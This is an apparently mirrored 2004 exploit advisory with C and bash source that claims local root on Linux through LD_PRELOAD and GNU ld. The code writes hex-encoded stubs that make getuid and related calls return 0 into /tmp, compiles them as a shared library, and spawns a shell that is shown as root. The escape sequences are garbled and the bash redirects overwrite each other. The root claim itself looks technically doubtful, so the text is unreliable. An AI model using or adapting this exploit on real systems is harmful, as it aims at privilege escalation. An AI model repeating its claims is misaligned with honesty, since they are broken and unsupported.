/*
str0ke / tested on patched up debian box (nice local)
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #01 - 28/12/04
--------------------------------------------------------
Program: ld - The GNU linker
Homepage: http://gcc.gnu.org
Vulnerable Versions: GNU gcc 3.4.3 and prior
Risk: High!!
Impact: Unchecked lenght fields
---------------------------------------------------------
- Description
---------------------------------------------------------
$ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
Value starts and ends with a slash and contains about 1200 characters.
LD_PRELOAD doesn't ignore setuid executables, like this one.
Unchecked lenght fields.
setuid(0);
setreuid(0,0);
int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }
- Tested
---------------------------------------------------------
I have done minimal testing on this.
Slackware 10.0
- Explotation
---------------------------------------------------------
$gcc ld_xpl_nst.c -o ld_xp_nst
$./ld_xp_nst
sh-3.00# id
uid=0(root) gid=0(root) groups=100(users)
sh-3.00#
This will give you a root shell
- Solutions
--------------------------------------------------------
Not Yet or i don't know xD
- References
--------------------------------------------------------
href=http://neosecurityteam.org/Advisories/Advisory-01.txt>http://neosecurityteam.org/
Advisories/Advisory-01.txt
- Credits
-------------------------------------------------
Discovered by HaCkZaTaN <hck_zatan@hotmail.com>
[N]eo [S]ecurity [T]eam [NST]® - href=http://neosecurityteam.org/>http://neosecurityteam.org/
Got Questions? href=http://neosecurityteam.org/foros/>http://neosecurityteam.org/foros/
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char NstCode[] =
"x69x6ex74x20x67x65x74x75x69"
"x64x28x29x20x7bx20x72x65x74"
"x75x72x6ex20x30x3bx20x7dx0a"
"x69x6ex74x20x67x65x74x65x75"
"x69x64x28x29x20x7bx20x72x65"
"x74x75x72x6ex20x30x3bx20x7d"
"x0ax69x6ex74x20x67x65x74x67"
"x69x64x28x29x20x7bx20x72x65"
"x74x75x72x6ex20x30x3bx20x7d"
"x0ax69x6ex74x20x67x65x74x65"
"x67x69x64x28x29x20x7bx20x72"
"x65x74x75x72x6ex20x30x3bx20"
"x7dx0ax0/bin/sh";
void FG(int Opt, int Colour);
void BG(int Colour);
void RC();
int main()
{
FILE *Nst_C;
int x, y;
for(x = 1; x < 2; x++)
for(y = 37; y < 38; y++) {
FG(x,y);
printf("[N]eo [S]ecurity [T]eam [N][S][T]!
");
}
RC();
Nst_C=fopen("/tmp/nst.c","w");
fprintf(Nst_C,"%s",NstCode);
fclose(Nst_C);
system("gcc -shared -o /tmp/nst.nfo /tmp/nst.c;rm -f /tmp/nst.c");
system("LD_PRELOAD=/tmp/nst.nfo /bin/sh");
for(x = 1; x < 2; x++)
for(y = 37; y < 38; y++) {
FG(x,y);
printf("[N]eo [S]ecurity [T]eam [N][S][T]!
");
}
RC();
return 0;
}
void FG(int Opt, int Colour) {
printf("�33[%d;%dm", Opt, Colour);
}
void RC() {
printf("�33[0;m");
}
/* Bash Code:
#! /bin/bash
echo -e "x69x6ex74x20x67x65x74x75x69x64x28x29x20x7bx20x72x65"
>/tmp/nst.c
echo -e "x74x75x72x6ex20x30x3bx20x7dx0ax69x6ex74x20x67x65x74"
>/tmp/nst.c
echo -e "x65x75x69x64x28x29x20x7bx20x72x65x74x75x72x6ex20x30"
>/tmp/nst.c
echo -e "x3bx20x7dx0ax69x6ex74x20x67x65x74x67x69x64x28x29x20"
>/tmp/nst.c
echo -e "x7bx20x72x65x74x75x72x6ex20x30x3bx20x7dx0ax69x6ex74"
>/tmp/nst.c
echo -e "x20x67x65x74x65x67x69x64x28x29x20x7bx20x72x65x74x75"
>/tmp/nst.c
echo -e "x72x6ex20x30x3bx20x7dx0ax0/bin/sh">/tmp/nst.c
sleep 1
gcc -shared -o /tmp/nst.nfo /tmp/nst.c
rm -rf /tmp/nst.c
sleep 4
echo -e "
"
export LD_LIBRARY_PATH=/tmp
LD_PRELOAD=/tmp/nst.nfo /bin/sh
*/
声明: 本页内容为中国Linux论坛的内容镜像,文章的版权以及其他所有的相关权利属于中国Linux论坛和相应文章的作者,如果转载,请注明文章来源及相关版权信息。
